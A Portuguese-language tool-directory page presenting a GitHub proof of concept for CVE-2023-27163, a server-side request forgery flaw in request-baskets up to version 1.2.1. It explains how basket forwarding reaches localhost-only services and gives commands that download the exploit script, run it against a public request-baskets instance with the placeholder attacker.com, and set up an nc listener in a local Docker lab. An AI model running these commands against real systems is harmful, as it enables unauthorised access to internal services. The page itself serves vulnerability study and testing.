Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-27163 — Prova de Conceito para Falsificação de Requisição no Lado do Servidor (SSRF) no request-baskets (<= v.1.2.1) | Kitploit
Ferramentas/GitHubGitHub/entr0pie/cve-2023-27163
ReconhecimentoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubentr0pie/cve-2023-27163

CVE-2023-27163

Prova de Conceito para Falsificação de Requisição no Lado do Servidor (SSRF) no request-baskets (<= v.1.2.1)

Ver Repositório
315há 3 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Site
Compartilhar

PoC de SSRF no Request-Baskets (CVE-2023-27163)

Este repositório contém uma Prova de Conceito (PoC) para CVE-2023-27163, uma vulnerabilidade de Server-Side Request Forgery (SSRF) descoberta no request-baskets até a versão 1.2.1. Esta vulnerabilidade permite que atacantes acessem recursos de rede e informações sensíveis explorando o componente /api/baskets/{name} através de uma requisição API manipulada.

Créditos para @b33t1e, @chelinboo147 e @houqinsheng (veja o artigo).

Uso

root@kitploit:~
wget https://raw.githubusercontent.com/entr0pie/CVE-2023-27163/main/CVE-2023-27163.sh
bash ./CVE-2023-27163.sh https://rbaskets.in/ http://attacker.com/

Como funciona?

Request-baskets é uma aplicação web construída para coletar e registrar requisições em uma rota específica, chamada de basket. Ao criá-la, o usuário pode especificar outro servidor para encaminhar a requisição. O problema aqui é que o usuário pode especificar serviços não intencionais, como aplicações fechadas na rede.

Por exemplo: suponha que o servidor hospede o Request-baskets (porta 55555) e um servidor web Flask na porta 8000. O Flask também está configurado para interagir apenas com localhost. Ao criar um basket que encaminha para http://localhost:8000, o atacante pode acessar o servidor web Flask anteriormente restrito.

Testando no localhost

PoC image

  1. Inicie o container Docker do Request-Baskets
root@kitploit:~
docker run -p 55555:55555 darklynx/request-baskets:v1.2.1
  1. Baixe a PoC
root@kitploit:~
wget https://raw.githubusercontent.com/entr0pie/CVE-2023-27163/main/CVE-2023-27163.sh
  1. Aguarde uma conexão
root@kitploit:~
nc -lvp 8000
  1. Salve o endereço IP do host docker
root@kitploit:~
DOCKER_IP=$(ifconfig docker0 | grep inet | head -n 1 | awk '{ print $2 }')
  1. Execute a PoC
root@kitploit:~
./CVE-2023-27163.sh http://127.0.0.1:55555/ http://$DOCKER_IP:8000/

Licença

Este projeto está sob a Unlicense.

Baixar ferramenta